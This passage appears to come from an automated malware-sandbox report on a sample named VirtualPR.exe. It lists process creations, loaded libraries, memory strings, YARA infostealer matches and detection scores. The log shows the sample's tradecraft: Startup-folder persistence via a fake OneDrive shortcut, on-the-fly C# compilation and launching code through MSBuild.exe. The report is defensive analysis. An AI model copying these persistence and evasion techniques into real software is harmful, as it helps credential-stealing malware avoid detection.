                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_03893F3812_2_03893F38
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_03890D9412_2_03890D94
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_03890CA812_2_03890CA8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_03891C5812_2_03891C58
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0340C28C12_2_0340C28C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_036F207012_2_036F2070
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_036DF63C12_2_036DF63C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_036EBC7812_2_036EBC78
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 22_2_039CAC4822_2_039CAC48
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 22_2_039593FC22_2_039593FC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 22_2_03A5B31C22_2_03A5B31C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 22_2_039B777C22_2_039B777C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 22_2_039596BC22_2_039596BC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 22_2_03958F3822_2_03958F38
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 22_2_03954F7C22_2_03954F7C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 22_2_03952E3822_2_03952E38
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 22_2_030407C522_2_030407C5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 035DA2F8 appears 239 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 03AA7678 appears 126 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 035DA3E4 appears 38 times
                  Source: VirtualPR.exe, 00000000.00000002.2191331562.000000000148E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs VirtualPR.exe
                  Source: VirtualPR.exe, 00000000.00000002.2201363512.00000000056A0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamesaruzovf.dll4 vs VirtualPR.exe
                  Source: VirtualPR.exe, 00000000.00000002.2201194976.0000000005680000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameGetLoSPXL.exe4 vs VirtualPR.exe
                  Source: VirtualPR.exe, 00000000.00000002.2195240211.0000000004C96000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameGetLoSPXL.exe4 vs VirtualPR.exe
                  Source: VirtualPR.exe, 00000000.00000002.2195240211.0000000004C96000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewbuje1zp.dll4 vs VirtualPR.exe
                  Source: VirtualPR.exe, 00000000.00000002.2201091147.0000000005660000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameGetLoSPXL.exe4 vs VirtualPR.exe
                  Source: VirtualPR.exe, 00000000.00000002.2201091147.0000000005660000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamewbuje1zp.dll4 vs VirtualPR.exe
                  Source: VirtualPR.exe, 00000000.00000002.2192138622.000000000364D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesaruzovf.dll4 vs VirtualPR.exe
                  Source: VirtualPR.exe, 0000000E.00000002.2395816552.0000000004C39000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedoceyppt.dll4 vs VirtualPR.exe
                  Source: VirtualPR.exe, 0000000E.00000002.2401047821.0000000005560000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameouz2pkol.dll4 vs VirtualPR.exe
                  Source: VirtualPR.exe, 0000000E.00000002.2374762048.0000000000FFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs VirtualPR.exe
                  Source: VirtualPR.exe, 0000000E.00000002.2395816552.0000000004C51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameGetLoSPXL.exe4 vs VirtualPR.exe
                  Source: VirtualPR.exe, 0000000E.00000002.2400872433.0000000005538000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamedoceyppt.dll4 vs VirtualPR.exe
                  Source: VirtualPR.exe, 0000000E.00000002.2378486056.000000000346D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameouz2pkol.dll4 vs VirtualPR.exe
                  Source: 22.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                  Source: 22.2.MSBuild.exe.35d0000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                  Source: 22.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                  Source: 00000016.00000002.2378527968.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                  Source: VirtualPR.exe, 0000000E.00000002.2374762048.0000000001031000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TSPolicyConfigs.snp;.VBP
                  Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@34/26@0/5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 22_2_0383D9A8 CoCreateInstance,22_2_0383D9A8
                  Source: C:\Users\user\Desktop\VirtualPR.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneDrive.urlJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5948:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4412:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5692:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3472:120:WilError_03
                  Source: C:\Users\user\Desktop\VirtualPR.exeFile created: C:\Users\user\AppData\Local\Temp\wbuje1zpJump to behavior
                  Source: VirtualPR.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                  Source: VirtualPR.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
                  Source: VirtualPR.exe, 00000000.00000002.2202796339.00000000066C1000.00000004.00000800.00020000.00000000.sdmp, VirtualPR.exe, 00000000.00000002.2214849304.00000000073F1000.00000004.00000800.00020000.00000000.sdmp, VirtualPR.exe, 00000000.00000002.2202796339.00000000060C1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000016.00000002.2378527968.0000000000400000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000016.00000002.2388879028.00000000035E9000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                  Source: VirtualPR.exe, 00000000.00000002.2202796339.00000000066C1000.00000004.00000800.00020000.00000000.sdmp, VirtualPR.exe, 00000000.00000002.2214849304.00000000073F1000.00000004.00000800.00020000.00000000.sdmp, VirtualPR.exe, 00000000.00000002.2202796339.00000000060C1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000016.00000002.2378527968.0000000000400000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000016.00000002.2388879028.00000000035E9000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                  Source: VirtualPR.exe, 00000000.00000002.2202796339.00000000066C1000.00000004.00000800.00020000.00000000.sdmp, VirtualPR.exe, 00000000.00000002.2214849304.00000000073F1000.00000004.00000800.00020000.00000000.sdmp, VirtualPR.exe, 00000000.00000002.2202796339.00000000060C1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000016.00000002.2378527968.0000000000400000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000016.00000002.2388879028.00000000035E9000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                  Source: VirtualPR.exe, 00000000.00000002.2202796339.00000000066C1000.00000004.00000800.00020000.00000000.sdmp, VirtualPR.exe, 00000000.00000002.2214849304.00000000073F1000.00000004.00000800.00020000.00000000.sdmp, VirtualPR.exe, 00000000.00000002.2202796339.00000000060C1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000016.00000002.2378527968.0000000000400000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000016.00000002.2388879028.00000000035E9000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                  Source: VirtualPR.exeVirustotal: Detection: 22%
                  Source: VirtualPR.exeReversingLabs: Detection: 36%
                  Source: unknownProcess created: C:\Users\user\Desktop\VirtualPR.exe "C:\Users\user\Desktop\VirtualPR.exe"
                  Source: C:\Users\user\Desktop\VirtualPR.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wbuje1zp\wbuje1zp.cmdline"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6976.tmp" "c:\Users\user\AppData\Local\Temp\wbuje1zp\CSCF3101B1DB5FD4234B8D9E3A32E163AE3.TMP"
                  Source: C:\Users\user\Desktop\VirtualPR.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\saruzovf\saruzovf.cmdline"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6F42.tmp" "c:\Users\user\AppData\Local\Temp\saruzovf\CSC9247E5327A274F0EA6778942D33863E.TMP"
                  Source: C:\Users\user\Desktop\VirtualPR.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: C:\Users\user\Desktop\VirtualPR.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: C:\Users\user\Desktop\VirtualPR.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: C:\Users\user\Desktop\VirtualPR.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: unknownProcess created: C:\Windows\Temp\VirtualPR.exe "C:\Windows\Temp\VirtualPR.exe"
                  Source: C:\Windows\Temp\VirtualPR.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\doceyppt.cmdline"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESAE8E.tmp" "c:\Users\user\AppData\Local\Temp\CSC5102464C238E498091ADEB255F7180.TMP"
                  Source: C:\Windows\Temp\VirtualPR.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ouz2pkol.cmdline"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB6AC.tmp" "c:\Users\user\AppData\Local\Temp\CSCEC34565AAA024FAC8226FC17CD3A3374.TMP"
                  Source: C:\Windows\Temp\VirtualPR.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: C:\Windows\Temp\VirtualPR.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: C:\Users\user\Desktop\VirtualPR.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wbuje1zp\wbuje1zp.cmdline"Jump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\saruzovf\saruzovf.cmdline"Jump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6976.tmp" "c:\Users\user\AppData\Local\Temp\wbuje1zp\CSCF3101B1DB5FD4234B8D9E3A32E163AE3.TMP"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6F42.tmp" "c:\Users\user\AppData\Local\Temp\saruzovf\CSC9247E5327A274F0EA6778942D33863E.TMP"Jump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\doceyppt.cmdline"Jump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ouz2pkol.cmdline"Jump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESAE8E.tmp" "c:\Users\user\AppData\Local\Temp\CSC5102464C238E498091ADEB255F7180.TMP"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB6AC.tmp" "c:\Users\user\AppData\Local\Temp\CSCEC34565AAA024FAC8226FC17CD3A3374.TMP"
                  Source: C:\Users\user\Desktop\VirtualPR.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: avifil32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msvfw32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msacm32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptui.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: pstorec.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dllJump to behavior
